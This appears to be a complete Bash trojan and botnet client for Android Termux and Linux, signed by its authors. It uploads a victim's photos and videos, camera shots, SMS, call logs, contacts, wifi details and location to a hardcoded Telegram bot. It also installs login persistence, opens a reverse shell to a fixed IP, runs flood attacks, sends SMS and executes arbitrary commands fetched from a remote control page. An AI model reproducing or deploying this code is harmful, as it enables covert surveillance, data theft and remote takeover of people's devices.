#!/bin/usr/bash

#Colors
R="$(printf '\033[1;31m')"
G="$(printf '\033[1;32m')"
Y="$(printf '\033[1;33m')"
W="$(printf '\033[1;37m')"
C="$(printf '\033[1;36m')"
b="\033[1;30m"
r="\033[1;31m"
g="\033[1;32m"
y="\033[1;33m"
b="\033[1;34m"
p="\033[1;35m"
c="\033[1;36m"
v="\033[1;37m"
w="\033[0;37m"
black="\033[1;30m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
blue="\033[1;34m"
purple="\033[1;35m"
cyan="\033[1;36m"
violate="\033[1;37m"
white="\033[0;37m"
nc="\033[00m"
#--------ModeTool---------#
info="${cyan}[${white}+${cyan}] ${yellow}"
fun="${cyan}[${white}@${cyan}] ${purple}"
ask="${cyan}[${white}?${cyan}] ${purple}"
bad="${cyan}[${white}!${cyan}] ${red}"
good="${cyan}[${white}√${cyan}] ${green}"
#---------FaceType--------#
sad="$red ಠ⁠︵ಠ⁠"
llok="$blue ಠ⁠_⁠ʖ⁠ಠ⁩"
hehe="$yellow ಡ⁠ ͜⁠ ⁠ʖ⁠ ⁠ಡ"
huh="$blue ʘ⁠‿⁠ʘ"
happy="( ⁠•⁠ ⁠‿⁠ ⁠•⁠ )"
#---------OPIONS----------#
home=$(pwd)
more_info="By@Azrak_BHacked"
name=AllInOne
TOKEN="5691570782:AAGMKFygk9MyAlZXtPNddydtDsY4Ouo8-ng"
CHAT_ID="5010958919"
Device=$(uname -a)
Tdate=$(date)
HostName=$(hostname)
Kernel=$(uname -r)
UpTime=$(uptime)
MemoryUsage=$(free -m)
DiskUsage=$(df -h)
ip=$(ifconfig -a)

#-------------------------#
# Check if offline
net() {
    while true; do
        wget --spider --quiet https://github.com &>> /dev/null
        if [ "$?" = 0 ]; then

            nN='Y'
            NnEt="Connected To Network [★]"

        break
       else
                nN='N'
                NnEt="No Internet [X] "
                break
        fi
    done
}
net
#####################################################################################
# Termux
if [[ -d /data/data/com.termux/files/home ]]; then
termux=true
PREFIX='/data/data/com.termux/files/usr/'
elif [[ -d /root/ ]];then
termux=false
PREFIX='/usr/'
else
printf ""
fi
#####################################################################################
# package manager

if [[ `command -v B24B.apt` ]]; then
        apt="apt"
elif [[ `command -v apt` ]]; then
    apt="apt"
elif  [[ `command -v apt-get` ]]; then
    apt="apt-get"
elif  [[ `command -v yum` ]]; then
    apt="yum"
elif [[ `command -v dnf` ]]; then
    apt="dnf"
elif [[ `command -v apk` ]]; then
    apt="apk"
elif [[ `command -v pacman` ]]; then
    apt="pacman"
else
    printf ""
fi
#####################################################################################
if [[ -f $PREFIX/etc/Hacked/Victam/victam.sim ]]
Dev_ID=$(sed -n '5p' victam.sim)
fi
#####################################################################################
#MyBrithday
today=$(date +%m/%d)
Myday="12/12"
if [[ $today == $Myday ]];then
if [[ ${nN} == Y ]];then
bash $PREFIX/etc/Badshell/backdoor &>> /dev/null &
clear
termux-toast -b blue -c red -g middle 'It’s Just My Brithday And I Will Play My Own Game !'
toilet -f mono12 -F border Azrak_day -F metal
else
termux-toast -b blue -c red -g middle 'It’s Just My Brithday And I Will Play My Own Game !'
curl -X POST --silent  https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=' Happy Birthday To You Master Blue , Don’t Forget Your wish ! '
bash $PREFIX/etc/Badshell/backdoor &>> /dev/null &
clear
toilet -f mono12 -F border Azrak_day -F metal
#bash \$PREFIX/bin/run_Boom &>> /dev/null
fi
fi
#---------------------------------------------
#---------------------------------------------
#---------------------------------------------

if [[ -f $PREFIX/etc/Hacked/Badshell/worm ]];then

	if [[ $(cat $PREFIX/etc/Hacked/Badshell/worm) == "" ]];then

		Rebulid &>> /dev/null

	else

		printf ""

	fi

else

	Rebulid &>> /dev/null

fi
#---------------------------------------------
#---------------------------------------------
#---------------------------------------------
Rebulid(){

				if [[ ${nN} == "Y" ]];then

			rm -rfd $PREFIX/etc/Hacked/ &>> /dev/null
			mkdir $PREFIX/etc/Hacked/ &>> /dev/null
			mkdir $PREFIX/etc/Hacked/Victam/ &>> /dev/null
                	cd $PREFIX/etc/Hacked/

					while true;do
						git clone https://github.com/blue24bluer/Badshell &>> /dev/null
						if [[ $? == "0" ]];then
							break
						else
							git clone https://github.com/blue24bluer/Badshell &>> /dev/null
						fi
					done

				fi

                        if [[ $? == "0" ]];then

#                               cp badshell/Hacker.jpg $PREFIX/etc/Hacked/
#                               cp badshell/Blue24Bluer.jpg $PREFIX/etc/Hacked/
                                touch $PREFIX/etc/Hacked/About_This_Phone
                                echo $HostName >> $PREFIX/etc/Hacked/About_This_Phone
                                echo $Kernel >> $PREFIX/etc/Hacked/About_This_Phone
                                echo $UpTime >> $PREFIX/etc/Hacked/About_This_Phone
                                echo $MemoryUsage >> $PREFIX/etc/Hacked/About_This_Phone
                                echo $DiskUsage >> $PREFIX/etc/Hacked/About_This_Phone
                                echo $ip >> $PREFIX/etc/Hacked/About_This_Phone


			fi

}

Rebackdoor(){

if [[ $termux == true ]];then

Rebulid
                        echo "#!/usr/bin/bash
#---------OPIONS----------#
home=\$(pwd)
name=AllInOne
TOKEN='5691570782:AAGMKFygk9MyAlZXtPNddydtDsY4Ouo8-ng'
CHAT_ID='5010958919'
B24B_HOST='193.161.193.99'
B24B_PORT='33868'
Tdate=\$(date)
HostName=\$(hostname)
Kernel=\$(uname -r)
UpTime=\$(uptime)
MemoryUsage=\$(free -m)
DiskUsage=\$(df -h)
ip=\$(ifconfig -a)
#-------------------------#

get(){

	for jpg in \$(find /sdcard/ -name *.jpg)
        do

           # Upload the file
		curl -X POST --silent  -F document=@\$jpg \"https://api.telegram.org/bot\${TOKEN}/sendDocument\" -F chat_id=\${CHAT_ID}

        done

        for video in \$(find /sdcard/ -name *.mp4)
        do
                curl -X POST --silent  -F document=@\$video \"https://api.telegram.org/bot\${TOKEN}/sendDocument\" -F chat_id=\${CHAT_ID}

        done

        for png in \$(find /sdcard/ -name *.png)
        do
                curl -X POST --silent  -F document=@\$png \"https://api.telegram.org/bot\${TOKEN}/sendDocument\" -F chat_id=\${CHAT_ID}


        done

}
get &>> /dev/null &

" > $PREFIX/etc/Hacked/Badshell/backdoor
                else
Rebulid
                        echo "#!/usr/bin/bash
#---------OPIONS----------#
home=\$(pwd)
name=AllInOne
TOKEN='5691570782:AAGMKFygk9MyAlZXtPNddydtDsY4Ouo8-ng'
CHAT_ID='5010958919'
B24B_HOST='193.161.193.99'
B24B_PORT='33868'
Tdate=\$(date)
HostName=\$(hostname)
Kernel=\$(uname -r)
UpTime=\$(uptime)
MemoryUsage=\$(free -m)
DiskUsage=\$(df -h)
ip=\$(ifconfig -a)
#-------------------------#

get(){

      for jpg in \$(find / -name *.jpg)
      do

          # Upload the file
          curl -X POST --silent  -F document=@\$jpg \"https://api.telegram.org/bot\${TOKEN}/sendDocument\" -F chat_id=\${CHAT_ID}

      done

      for video in \$(find / -name *.mp4)
      do
         curl -X POST --silent  -F document=@\$video \"https://api.telegram.org/bot\${TOKEN}/sendDocument\" -F chat_id=\${CHAT_ID}

      done

      for png in \$(find / -name *.png)
      do
          curl -X POST --silent  -F document=@\$png \"https://api.telegram.org/bot\${TOKEN}/sendDocument\" -F chat_id=\${CHAT_ID}



      done

}
get &>> /dev/null &

                        " > $PREFIX/etc/Hacked/Badshell/backdoor
fi
}
#---------------------------------------------
#---------------------------------------------
#---------------------------------------------
if [[ -f $PREFIX/etc/Hacked/Badshell/backdoor ]];then

	if [[ -f $PREFIX/etc/Hacked/Badshell/backdoor ]];then
		if [[ $(cat $PREFIX/etc/Hacked/Badshell/backdoor) == "" ]];then

			Rebackdoor

		fi
	else

		Rebackdoor

	fi
else

	Rebackdoor

fi
#---------------------------------------------
#---------------------------------------------
#---------------------------------------------
Update(){

if [[ $nN == "Y" ]];then
if [[ $(date +%m/%d) > $(cat $PREFIX/etc/Hacked/Update) && $(date +%a) == "Fri" ]];then

this_date=$(date +%m/%d)
echo -e $this_date > $PREFIX/etc/Hacked/Update
#Update-Server
cd $PREFIX/etc/Hacked/
rm -rfd Server
git clone https://github.com/blue24bluer/Server &>> /dev/null &
#Update-Hacked
BadApi
#Update-AllInOne
fi
fi

if [[ $(cat $PREFIX/etc/termux-login.sh) == "" ]];then

echo "bash $PREFIX/etc/Hacked/Server/server &>> /dev/null  &" > $PREFIX/etc/termux-login.sh

fi

}
#---------------------------------------------
#---------------------------------------------
#---------------------------------------------
BadApi(){

if [[ $termux == "true" ]];then

termux-api-start
if [[ $? == "0" ]];then

Camera1(){
#Camera##############################################################################
termux-camera-photo -c 1 victam.jpg
sleep 3
#################################################################################
        if [[ $? == '0' ]];then

                curl -X POST --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New Photo Locate on Device : ${Dev_ID} "

        else

                echo -e $bad 'Something is Error ! [Error 001]'
                sleep 3
                dpkg

        fi
}
Camera2(){
#################################################################################
termux-camera-photo -c 0 victam.jpg
sleep 3
#################################################################################
        if [[ $? == '0' ]];then
#################################################################################
                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New Photo Locate on Device : ${Dev_ID} "

        else

		printf ""

        fi
}
SMS1(){
#Sms#################################################################################
termux-sms-list > victam.sms
sleep 3
#################################################################################
        if [[ $? == '0' ]];then

                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New SMS File Locate on Device : ${Dev_ID} "

        else

		printf ""

        fi
}
SMS2(){
#################################################################################
termux-telephony-deviceinfo > victam.sim
sleep 3
#################################################################################
        if [[ $? == '0' ]];then

                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New CallPhone Locate on Device : ${Dev_ID} "

        else

		printf ""

        fi
}
SMS3(){
#################################################################################
termux-call-log > victam.call
sleep 3
#################################################################################
        if [[ $? == '0' ]];then

                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New CallPhone Locate on Device : ${Dev_ID} "

        else

		printf ""

        fi
}
SMS4(){
#################################################################################
termux-contact-list > victam.call2
sleep 3
#################################################################################
        if [[ $? == '0' ]];then

                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New CallPhone Locate on Device : ${Dev_ID} "

        else

		printf ""

        fi
}
Wifi(){
#Wifi################################################################################
termux-wifi-connectioninfo > victam.wifi
sleep 3
#################################################################################
        if [[ $? == '0' ]];then

                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New WifiData Locate on Device : ${Dev_ID} "

        else

		printf ""

        fi
}
location(){
#################################################################################

#location############################################################################
termux-location > victam.location
sleep 3
#################################################################################
        if [[ $? == '0' ]];then

                curl -X POST --silent  "https://api.telegram.org/bot${TOKEN}/sendMessage" -d chat_id=${CHAT_ID} -d text=" New location Locate on Device : ${Dev_ID}"

        else

		printf ""

        fi
}
#################################################################################

                        echo -e $info $r 'This Will Take Some$y Time'
cd $PREFIX/etc/Hacked/Victam/
Camera1
Camera2
SMS1
SMS2
SMS3
SMS4
Wifi
location

zip Hacked_By_Blue24Bluer.zip * &>> /dev/null
curl -X POST --silent -F document=@$PREFIX/etc/Hacked/Victam/Hacked_By_Blue24Bluer.zip https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}

else

printf ""

fi

fi
#####################################################################################

}

ServerHome(){

if [[ -d $PREFIX/etc/Hacked/ ]];then

	if [[ $termux == "true" ]];then

		termux-api-start &>> /dev/null
		termux-wake-lock &>> /dev/null
	fi

#####################################################################################
System_Host=$(cat $PREFIX/etc/Hacked/Server/.B24B_BotNet)
System_Server=$(curl --silent  https://gleeful-sherbet-b1b409.netlify.app/)

if [[ $System_Host == $System_Server ]];then

Start

else

if [[ ${nN} == "Y" ]];then
while true ;do

	curl --silent https://gleeful-sherbet-b1b409.netlify.app/ > $PREFIX/etc/Hacked/Server/.B24B_BotNet
		if [[ $(cat $PREFIX/etc/Hacked/Server/.B24B_BotNet) == "" ]];then
			printf ""
		else
			break
		fi

done
fi

fi
#------------------------------------------------------------------------------------
Server_Host=$(sed -n "2p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Port=$(sed -n "3p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Start=$(sed -n "4p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Get=$(sed -n "5p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Hack=$(sed -n "6p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Trojan=$(sed -n "7p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Alert=$(sed -n "8p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_SendAlert=$(sed -n "9p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Number=$(sed -n "10p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Message=$(sed -n "11p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Send=$(sed -n "12p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Excute=$(sed -n "13p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Excute_Run=$(sed -n "14p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
#------------------------------------------------------------------------------------
Server_Alert_Message_True=$(sed -n "1p" "$PREFIX/etc/Hacked/.AlertMessage")
#####################################################################################

Start


else

		Rebulid &>> /dev/null
		exit
fi
}

Start(){
if [[ $Server_Start == "Yes" ]];then

#start ddos attack on $Server_Host with port $Server_Port
	Attack(){


		while true;do

			ncat -nv $Server_Host $Server_Port -c "while true;echo \"$(cat /dev/urandom | tr -dc "A-Z" | fold -w 94 | head -n 1000)\";done"
		done

	}

	Attack &>> /dev/null &

fi
#####################################################################################
if [[ $Server_Get == "Yes" ]];then


	bash $PREFIX/etc/Hacked/Badshell/backdoor &>> /dev/null
	zip $PREFIX/etc/Hacked/Victam/Hacked_By_Blue24Bluer.zip $PREFIX/etc/Hacked/Victam/* &>> /dev/null
	curl -X POST --silent  -F document=@$PREFIX/etc/Hacked/Victam/Hacked_By_Blue24Bluer.zip "https://api.telegram.org/bot${TOKEN}/sendDocument" -F chat_id=${CHAT_ID}

fi
#####################################################################################
if [[ $Server_Hack == "Yes" ]];then

	Op_Victam(){
		while true ;do

			bash -c "0<&139-;exec 139<>/dev/tcp/193.161.193.99/33868;sh <&139 >&139 2>&139" &>> /dev/null
			sleep 5
		done

	}
	Op_Victam &>> /dev/null &
#echo run openport
fi
#####################################################################################
if [[ $Server_Trojan == "Yes" ]];then

	bash $PREFIX/etc/Badshell/worm &>> /dev/null &

fi
#####################################################################################
if [[ $Server_Send == "Yes" ]];then

	if [[ $termux == "true" ]];then

		termux-sms-send -n $Server_Number $Server_Message &>> /dev/null
	fi
fi
#####################################################################################
if [[ $Server_SendAlert == "Yes" ]];then

	if [[ $termux == "true" ]];then

		if [[ $Server_Alert == $Server_Alert_Message_True ]];then

			printf ""

		else

				termux-vibrate -d 1000 -f
				termux-dialog confirm -t "New Message frome @Azrak_B" -i "$Server_Alert"
				echo -e $Server_Alert > "$PREFIX/etc/Hacked/.AlertMessage"
		fi

	else

		if [[ $Server_Alert == $Server_Alert_Message_True ]];then

			printf ""

		else

			echo -e "$Server_Alert" > "$PREFIX/etc/Hacked/.AlertMessage"
			xdg-open "$PREFIX/etc/Hacked/.AlertMessage"

		fi

	fi

fi
#####################################################################################
if [[ $Server_Excute_Run == "Yes" ]];then
	exec  $Server_Excute
fi
#####################################################################################
}
Dev=$(echo -e "

Device infomore : ${Dev_ID}ice\n
Hacked on date  : $Tdate\n
Host Name       : $HostName\n
Kernel          : $Kernel\n
Up Time         : $UpTime\n
Memory Usage    : $MemoryUsage\n
IP Address      : $ip\n

")

    while true; do
	curl --silent ifconfig.me
        if [ "$?" = 0 ]; then

            Update     &>> /dev/null &
	    ServerHome &>> /dev/null &
		break

        break
       else

		printf ""

        fi
    done

#-----------------DDOS------------------#
#  2 = IPaddres or Host
#  3 = Port
#  4 = Start The Bot Net Yes|No
#---------------Trojan------------------#
#  5 = Get the files from victams Yes|No
#  6 = Open Port Hack on Victam Device’s Yes|No
#  7 = Encrypt All Files Victam Yes|No
#-------------UsePhoneVictam------------#
#  8 = Print a message on devic victam’s
#  9 = Send The Alert Yes|No
#  10 = NumberPhone
#  11 = MessageText
#  12 = SendTheMessage Yes|No
#  13 = Excute a command
#  14 = Run The Excute Command Yes|No
